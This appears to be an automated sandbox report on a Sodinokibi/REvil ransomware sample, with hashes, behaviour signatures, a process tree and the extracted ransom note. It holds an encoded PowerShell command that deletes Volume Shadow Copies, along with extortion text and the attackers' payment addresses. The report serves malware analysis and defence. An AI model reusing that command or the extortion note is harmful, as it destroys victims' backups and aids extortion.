Overview

overview

10

Static

static

10

e2708d3c57...18.exe

windows11-21h2-x64

10

Resubmissions

18-09-2024 11:32

240918-nnmz7azakp 10

15-09-2024 12:50

240915-p21c4svflm 10

15-09-2024 12:44

240915-pysh4atflf 10

15-09-2024 12:04

240915-n83ldatdpl 10

Analysis

  • max time kernel
    89s
  • max time network
    92s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    15-09-2024 12:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe

  • Size

    165KB

  • MD5

    e2708d3c57b562b01da42f9e7549781f

  • SHA1

    3d82951dbfab5629187b26ecb7388b7a05597f67

  • SHA256

    d976a41f366fb1e3a0a5d15878d84e24704949973d9e0ccead9a779dee03ef0f

  • SHA512

    c483968f981e64021025bf4f42424df3cfb88a55bd4cb7f2aa904515eccb85e239c3d44812b28d5b617b6b8476dcc3f4258465a211ae6e6725adbf1850234619

  • SSDEEP

    3072:eCEq0R0nZ5ys5n4Y9doh7O79siUs/NaxohzDKMlt:lw02sJPi7O93N3FHlt

Score
10/10
sodinokibidiscoveryransomware

Malware Config

Extracted

Path

C:\Users\82iq912j-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. CDHFUND. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 82iq912j. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/172B6E645B562FA8 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/172B6E645B562FA8 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: uems5To8Z1QHiJJzJ8benZYReOzjLQCabXL2m8BUgWwNqXCtT8ZLmJ3A2f9Zmioc mwu2xuPD0nbnv7nroqY/+DuOjTIZxLo66YCy0k1lPCtG7bXeuCcdPGakWD0C0lXy zRycBxxT5dbjvM5ZYGRwZK3fQBb/78AFXPAqFr+jiRrVNsEitr/5ScvSa/hSBoNK Cezc6MoYkXOy1BBh3uyBfoMYMpkBWphwuO0jL2JO8rAyORIBOfH4jrkJBLWU+/kC W/Hm3WqOqfQ2HOOC9lTFM4KrLsJSTV+fvp/V7cNlaOQrDnOBWHKmc7MPOmsFaIcN hGyd39+F6uKfkiSkRpSAjSWk+Qixa/5UmTpoQUYLzm10l1tvBKauiUGyssXJG8Kc 376hJ+8/8ajem+Qrg7lrKJLiQ3tBP/wsLLXFHP9WeT9dbstS+FzpUte9Z9wySBGE eF62yhJgma+O9aU1wlJz44dohWDvl95Qogjkiy8fVpxil7oK9g8wATE+nXh3jUbg Na7x3Lz5bdXtJyWzQzWySFKY3+8vgJiGEr8on3aWwkN/V0bm7g/Mj0SQauyW2T7Y uWa4ZnJcUjvbZXPHdFuk1YXw1Ys9l/wfAOzEevnBzFr8geAa9TNjvKMcscDzz4I7 Y6hLDi8/liY6gz1AHvCxrswHQLyW73o0NxPon6YPQ1q04s5t2LRnIKPVBGfrf9Cn fG+CJta9JmpQ8VYAqCB8DMlMfVfBLUflJfsrMtAVz3zqoNf/9Ba/q/P6emrGPfkq pYRdO5q65D3/5749mRltGl2wNwanIbaDI+siPgl8E+tJgdRvoen5vMmR4TabKH9o PsoAAiFhW3Pz2cmVTo2xGvh21hvoOg+AyznONWbe/70D6sFztDBF+lw6BPs0gcto 6GlgX7VeUmRFtrav1nvkeHYhfqdE0Q1L1I3X1xsYH8fF46bFvC+o/Gizhx9+k+T4 yJSnIoM0YbOZOfbCgkWCVUOzEkgbxq96YGouulrBW6OyU940to3tkaOtUzTig79p 6TgMTnJKGy4RolOphc/4xxR46LEhQQrDfg3GjyL3NqBHWAikjvr18C6GlHsaTkA1 R5yM/1XvYP3pgha7LeGMs4MdEYO3MyYNvFuEBvIBOHIlVrWNqsLzuJPbx27P/HwF bcChFmEuy4oJOkEB6210EC0j1V665Ktvo0razfMJeCTOK2OJ6lz3ztpYoJUSFHTU WlDrwHXVP1Z2YHpReI51M4g5ALXF7g== Extension name: 82iq912j ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/172B6E645B562FA8

http://decryptor.top/172B6E645B562FA8

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 32 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 40 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4760
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4120
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2240
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2076
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:232
      • C:\Windows\system32\OpenWith.exe
        C:\Windows\system32\OpenWith.exe -Embedding
        1⤵
        • Modifies registry class
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2948
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Documents\StepPing.doc.82iq912j"
          2⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Checks processor information in registry
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2012
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3812
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=CFD4CCF2226F063364C984852228E8F0 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=CFD4CCF2226F063364C984852228E8F0 --renderer-client-id=2 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job /prefetch:1
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2620
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4FCD6BCE4822214D57ECED2F0DF756C4 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              4⤵
              • System Location Discovery: System Language Discovery
              PID:784
      • C:\Windows\System32\CompPkgSrv.exe
        C:\Windows\System32\CompPkgSrv.exe -Embedding
        1⤵
          PID:3128
        • C:\Windows\system32\NOTEPAD.EXE
          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\82iq912j-readme.txt
          1⤵
            PID:3124
          • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
            "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Documents\StepPing.doc" /o ""
            1⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious use of SetWindowsHookEx
            PID:3824

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\82iq912j-readme.txt
            Filesize

            6KB

            MD5

            78bcd40188b3f2e60e93729fa39e1c48

            SHA1

            52ec776bf3a56943becd0f62910094ecee56c54b

            SHA256

            01d27333f399724364a0ab07b62ae55c80fa571a3375319923be510e1832db78

            SHA512

            4044459fd1ea78c15f6d403a3d801def90f1def9313ef64b617e7040434fac182849a4bd8403c8c1f7d120a6e9f0159d91d71eb1d27402087a97be69b5cdcc91

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uz1dm1wt.b14.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
            Filesize

            297B

            MD5

            8c82574bf7a165bb658a3c55bc8a7507

            SHA1

            7a799afcea818d9e37b07f88630a2f43aee90d34

            SHA256

            9dab31f52510b4ba7ae5e9fff64f2448ffae69f0eba46288d580dffed71490bc

            SHA512

            e0a21e95aee133f7ae5a5e31166c1e66d2535388d687ec8b0ad030e66c3fcdbc78ae6c9728795cc6b898dd37b1fc281698aca277a23769ef892fa620ab9a190d

            Download Submit

          • C:\Users\Admin\Documents\StepPing.doc.82iq912j
            Filesize

            482KB

            MD5

            ad719d0af662079f39898bc989a58b7b

            SHA1

            649a3f82dd904ebb39052ce03baa4f84bcb181f3

            SHA256

            6917ce0cf2f1d3a6c8e25e1b67ca249f72b2f1eb5084e15dcc450a08db7cd716

            SHA512

            be1c0867d0dbdee68802bde252a11dc67c3362f4d039767cf9118099d9ddbe8a0265e5a64966f73b76f5edef822ffa285a7586496d76acb98b912b19680c4c58

            Download Submit

          • memory/3824-458-0x00007FF8302B0000-0x00007FF8302C0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3824-456-0x00007FF8302B0000-0x00007FF8302C0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3824-459-0x00007FF8302B0000-0x00007FF8302C0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3824-460-0x00007FF8302B0000-0x00007FF8302C0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3824-457-0x00007FF8302B0000-0x00007FF8302C0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3824-461-0x00007FF82D830000-0x00007FF82D840000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3824-462-0x00007FF82D830000-0x00007FF82D840000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4120-12-0x00007FF84E510000-0x00007FF84EFD2000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4120-15-0x00007FF84E510000-0x00007FF84EFD2000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4120-11-0x00007FF84E510000-0x00007FF84EFD2000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4120-10-0x00007FF84E510000-0x00007FF84EFD2000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4120-0-0x00007FF84E513000-0x00007FF84E515000-memory.dmp

            Filesize

            8KB

            Download

          • memory/4120-1-0x000001F1A7D80000-0x000001F1A7DA2000-memory.dmp

            Filesize

            136KB

            Download